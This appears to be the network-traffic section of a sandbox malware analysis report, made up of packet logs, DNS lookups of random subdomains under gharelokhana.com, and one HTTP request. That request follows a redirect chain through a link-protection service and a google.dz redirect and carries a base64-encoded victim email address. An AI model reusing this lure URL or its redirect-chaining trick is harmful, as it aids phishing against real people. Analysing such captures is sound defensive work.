                                                                                                                                                                                                Dec 5, 2024 08:26:47.401420116 CET44350063164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:26:47.401635885 CET50063443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:26:47.401664972 CET44350063164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:26:47.401686907 CET50063443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:26:47.401736975 CET50063443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:26:48.052386999 CET50072443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:26:48.052433968 CET44350072164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:26:48.052643061 CET50072443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:26:48.052844048 CET50072443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:26:48.052855015 CET44350072164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:26:49.434475899 CET44350072164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:26:49.434837103 CET50072443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:26:49.434868097 CET44350072164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:26:49.435184956 CET44350072164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:26:49.435446978 CET50072443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:26:49.435511112 CET44350072164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:26:49.436002970 CET50072443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:26:49.479337931 CET44350072164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:26:50.369966030 CET44350072164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:26:50.370047092 CET44350072164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:26:50.370089054 CET50072443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:26:50.370157957 CET50072443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:26:50.370174885 CET44350072164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:01.361151934 CET50073443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:01.361202955 CET44350073164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:01.362365961 CET50073443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:01.362668037 CET50073443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:01.362683058 CET44350073164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:02.747534037 CET44350073164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:02.799402952 CET50073443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:02.805402040 CET50073443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:02.805414915 CET44350073164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:02.805778027 CET44350073164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:02.846297026 CET50073443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:02.913871050 CET50073443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:02.913976908 CET44350073164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:02.915447950 CET50073443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:02.963339090 CET44350073164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:03.713900089 CET44350073164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:03.713994980 CET44350073164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:03.714154005 CET50073443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:03.714174032 CET44350073164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:03.714184999 CET50073443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:03.714229107 CET50073443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:18.582741022 CET50074443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:18.582794905 CET44350074164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:18.582881927 CET50074443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:18.583126068 CET50074443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:18.583142042 CET44350074164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:19.967937946 CET44350074164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:19.968204975 CET50074443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:19.968225956 CET44350074164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:19.968584061 CET44350074164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:19.968852043 CET50074443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:19.968916893 CET44350074164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:19.969085932 CET50074443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:20.015331984 CET44350074164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:20.861608982 CET44350074164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:20.861699104 CET44350074164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:20.861788988 CET50074443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:20.861954927 CET50074443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:20.861972094 CET44350074164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:26.795523882 CET50075443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:26.795578003 CET44350075164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:26.795659065 CET50075443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:26.795923948 CET50075443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:26.795938015 CET44350075164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:28.175976038 CET44350075164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:28.176306009 CET50075443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:28.176336050 CET44350075164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:28.176688910 CET44350075164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:28.176971912 CET50075443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:28.177035093 CET44350075164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:28.177469969 CET50075443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:28.223334074 CET44350075164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:29.073348045 CET44350075164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:29.073448896 CET44350075164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:29.073563099 CET50075443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:29.073669910 CET50075443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:29.073693037 CET44350075164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:56.134424925 CET50076443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:56.134466887 CET44350076164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:56.134536028 CET50076443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:56.135049105 CET50076443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:56.135057926 CET44350076164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:57.513784885 CET44350076164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:57.533621073 CET50076443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:57.533634901 CET44350076164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:57.534024954 CET44350076164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:57.537276030 CET50076443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:57.537342072 CET44350076164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:57.537569046 CET50076443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:57.583326101 CET44350076164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:58.428626060 CET44350076164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:58.428720951 CET44350076164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:58.428807974 CET50076443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:58.429110050 CET50076443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:27:58.429131031 CET44350076164.92.191.86192.168.2.8
                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Dec 5, 2024 08:24:11.197937965 CET5135553192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:11.198286057 CET6007053192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:11.324985981 CET53570821.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:11.339495897 CET53521151.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:11.430449963 CET53513551.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:11.448494911 CET53600701.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:15.507671118 CET5768753192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:15.508169889 CET5750753192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:15.644906998 CET53576871.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:15.645467997 CET53575071.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:15.816329002 CET53647321.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:17.593303919 CET5753053192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:17.593502045 CET5940353192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:17.731405020 CET53594031.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:17.731421947 CET53575301.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:20.259886980 CET5591053192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:20.259938955 CET5222753192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:20.399338961 CET53559101.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:20.498285055 CET53522271.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:25.761861086 CET6270953192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:25.762008905 CET5544653192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:25.902509928 CET53554461.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:25.903470993 CET53627091.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:28.177431107 CET5701453192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:28.177885056 CET6186753192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:28.315249920 CET53570141.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:28.315839052 CET53618671.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:32.878797054 CET53565621.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:37.220432997 CET4993953192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:37.225922108 CET4940153192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:37.444631100 CET53494011.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:37.451114893 CET53499391.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:40.227426052 CET4925153192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:40.227577925 CET5547353192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:40.367192984 CET53492511.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:40.367929935 CET53554731.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:42.663364887 CET5057253192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:42.663868904 CET5852153192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:42.881184101 CET53585211.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:42.897640944 CET53505721.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:43.160017014 CET5013853192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:43.160778999 CET6247653192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:43.377190113 CET53501381.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:43.398911953 CET53624761.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.238518953 CET6135353192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:46.238768101 CET5793753192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:46.315028906 CET6432753192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:46.315193892 CET6076753192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:46.376393080 CET53579371.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.376538038 CET53613531.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.453617096 CET53643271.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.453668118 CET53607671.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:47.038407087 CET5966753192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:47.039026022 CET5984153192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:47.270610094 CET53596671.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:47.273142099 CET53598411.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:51.811414957 CET53550631.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:55.079279900 CET6419053192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:55.079418898 CET5867953192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:24:55.304240942 CET53641901.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:55.312922001 CET53586791.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:58.444664955 CET53580341.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:01.594275951 CET5793953192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:25:01.594450951 CET5414353192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:25:01.739950895 CET53541431.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:01.740775108 CET53579391.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:10.798338890 CET53514321.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:15.044663906 CET53632131.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:45.015110016 CET53498531.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:26:32.018548012 CET53579321.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:45.333072901 CET53547871.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:46.649926901 CET5721253192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:27:46.650077105 CET5285153192.168.2.81.1.1.1
                                                                                                                                                                                                Dec 5, 2024 08:27:46.875771999 CET53572121.1.1.1192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:27:46.884783030 CET53528511.1.1.1192.168.2.8
                                                                                                                                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                Dec 5, 2024 08:24:20.498363972 CET192.168.2.81.1.1.1c223(Port unreachable)Destination Unreachable
                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                Dec 5, 2024 08:24:11.197937965 CET192.168.2.81.1.1.10xb1f0Standard query (0)linkprotect.cudasvc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:11.198286057 CET192.168.2.81.1.1.10x9b8Standard query (0)linkprotect.cudasvc.com65IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:15.507671118 CET192.168.2.81.1.1.10x68a3Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:15.508169889 CET192.168.2.81.1.1.10x134bStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:17.593303919 CET192.168.2.81.1.1.10x5339Standard query (0)google.dzA (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:17.593502045 CET192.168.2.81.1.1.10x1563Standard query (0)google.dz65IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:20.259886980 CET192.168.2.81.1.1.10xa480Standard query (0)www.google.dzA (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:20.259938955 CET192.168.2.81.1.1.10xeb51Standard query (0)www.google.dz65IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:25.761861086 CET192.168.2.81.1.1.10xdb8fStandard query (0)alvoradavisual.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:25.762008905 CET192.168.2.81.1.1.10x40edStandard query (0)alvoradavisual.com.br65IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:28.177431107 CET192.168.2.81.1.1.10xe7b5Standard query (0)djdjkdlellekkff.gharelokhana.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:28.177885056 CET192.168.2.81.1.1.10x484eStandard query (0)djdjkdlellekkff.gharelokhana.com65IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:37.220432997 CET192.168.2.81.1.1.10x9bf1Standard query (0)e7a91062-5bf3911d.gharelokhana.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:37.225922108 CET192.168.2.81.1.1.10x90dStandard query (0)e7a91062-5bf3911d.gharelokhana.com65IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:40.227426052 CET192.168.2.81.1.1.10x4cd9Standard query (0)e7a91062-5bf3911d.gharelokhana.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:40.227577925 CET192.168.2.81.1.1.10x99b8Standard query (0)e7a91062-5bf3911d.gharelokhana.com65IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:42.663364887 CET192.168.2.81.1.1.10x3c6fStandard query (0)43042841-5bf3911d.gharelokhana.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:42.663868904 CET192.168.2.81.1.1.10x14a4Standard query (0)43042841-5bf3911d.gharelokhana.com65IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:43.160017014 CET192.168.2.81.1.1.10xff1fStandard query (0)82ce8558-5bf3911d.gharelokhana.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:43.160778999 CET192.168.2.81.1.1.10xc086Standard query (0)82ce8558-5bf3911d.gharelokhana.com65IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:46.238518953 CET192.168.2.81.1.1.10x1256Standard query (0)l1ve.gharelokhana.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:46.238768101 CET192.168.2.81.1.1.10xb276Standard query (0)l1ve.gharelokhana.com65IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:46.315028906 CET192.168.2.81.1.1.10xb586Standard query (0)82ce8558-5bf3911d.gharelokhana.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:46.315193892 CET192.168.2.81.1.1.10x6b87Standard query (0)82ce8558-5bf3911d.gharelokhana.com65IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:47.038407087 CET192.168.2.81.1.1.10x6e12Standard query (0)67f9d952-5bf3911d.gharelokhana.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:47.039026022 CET192.168.2.81.1.1.10x9d7eStandard query (0)67f9d952-5bf3911d.gharelokhana.com65IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:55.079279900 CET192.168.2.81.1.1.10x9a92Standard query (0)5088df79-5bf3911d.gharelokhana.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:55.079418898 CET192.168.2.81.1.1.10x3319Standard query (0)5088df79-5bf3911d.gharelokhana.com65IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:25:01.594275951 CET192.168.2.81.1.1.10xd1f4Standard query (0)djdjkdlellekkff.gharelokhana.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:25:01.594450951 CET192.168.2.81.1.1.10x9ef4Standard query (0)djdjkdlellekkff.gharelokhana.com65IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:27:46.649926901 CET192.168.2.81.1.1.10x6a7eStandard query (0)wwwms.gharelokhana.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:27:46.650077105 CET192.168.2.81.1.1.10x991cStandard query (0)wwwms.gharelokhana.com65IN (0x0001)false
                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                Dec 5, 2024 08:24:11.430449963 CET1.1.1.1192.168.2.80xb1f0No error (0)linkprotect.cudasvc.com18.194.24.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:11.430449963 CET1.1.1.1192.168.2.80xb1f0No error (0)linkprotect.cudasvc.com18.194.13.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:15.644906998 CET1.1.1.1192.168.2.80x68a3No error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:15.645467997 CET1.1.1.1192.168.2.80x134bNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:17.731421947 CET1.1.1.1192.168.2.80x5339No error (0)google.dz172.217.17.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:20.399338961 CET1.1.1.1192.168.2.80xa480No error (0)www.google.dz216.58.208.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:25.903470993 CET1.1.1.1192.168.2.80xdb8fNo error (0)alvoradavisual.com.br191.252.140.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:28.315249920 CET1.1.1.1192.168.2.80xe7b5No error (0)djdjkdlellekkff.gharelokhana.com164.92.191.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:37.451114893 CET1.1.1.1192.168.2.80x9bf1No error (0)e7a91062-5bf3911d.gharelokhana.com164.92.191.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:40.367192984 CET1.1.1.1192.168.2.80x4cd9No error (0)e7a91062-5bf3911d.gharelokhana.com164.92.191.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:42.897640944 CET1.1.1.1192.168.2.80x3c6fNo error (0)43042841-5bf3911d.gharelokhana.com164.92.191.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:43.377190113 CET1.1.1.1192.168.2.80xff1fNo error (0)82ce8558-5bf3911d.gharelokhana.com164.92.191.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:46.376538038 CET1.1.1.1192.168.2.80x1256No error (0)l1ve.gharelokhana.com164.92.191.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:46.453617096 CET1.1.1.1192.168.2.80xb586No error (0)82ce8558-5bf3911d.gharelokhana.com164.92.191.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:47.270610094 CET1.1.1.1192.168.2.80x6e12No error (0)67f9d952-5bf3911d.gharelokhana.com164.92.191.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:24:55.304240942 CET1.1.1.1192.168.2.80x9a92No error (0)5088df79-5bf3911d.gharelokhana.com164.92.191.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:25:01.740775108 CET1.1.1.1192.168.2.80xd1f4No error (0)djdjkdlellekkff.gharelokhana.com164.92.191.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 5, 2024 08:27:46.875771999 CET1.1.1.1192.168.2.80x6a7eNo error (0)wwwms.gharelokhana.com164.92.191.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                • linkprotect.cudasvc.com
                                                                                                                                                                                                • google.dz
                                                                                                                                                                                                • www.google.dz
                                                                                                                                                                                                • alvoradavisual.com.br
                                                                                                                                                                                                • https:
                                                                                                                                                                                                  • djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                  • e7a91062-5bf3911d.gharelokhana.com
                                                                                                                                                                                                  • 82ce8558-5bf3911d.gharelokhana.com
                                                                                                                                                                                                  • l1ve.gharelokhana.com
                                                                                                                                                                                                  • 67f9d952-5bf3911d.gharelokhana.com
                                                                                                                                                                                                  • 5088df79-5bf3911d.gharelokhana.com
                                                                                                                                                                                                • 43042841-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                0192.168.2.84972818.194.24.714436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:14 UTC1041OUTGET /url?a=https%3a%2f%2fgoogle.dz%2furl%3fq%3dnrnq5JLi6z3yh%26rct%3dtTPvvq6xRyj7Y00xDjnlx9kIjusucT%26sa%3dt%26url%3damp%2fs%252falvoradavisual.com.br%252fyoya%2fcjbh%2fa2xhdXMubWFkZXJAc2JvLmNvLmF0%c3%a3%e2%82%ac%e2%80%9a%24%24%24%c3%a3%e2%82%ac%e2%80%9a&c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&typo=1 HTTP/1.1
                                                                                                                                                                                                Host: linkprotect.cudasvc.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
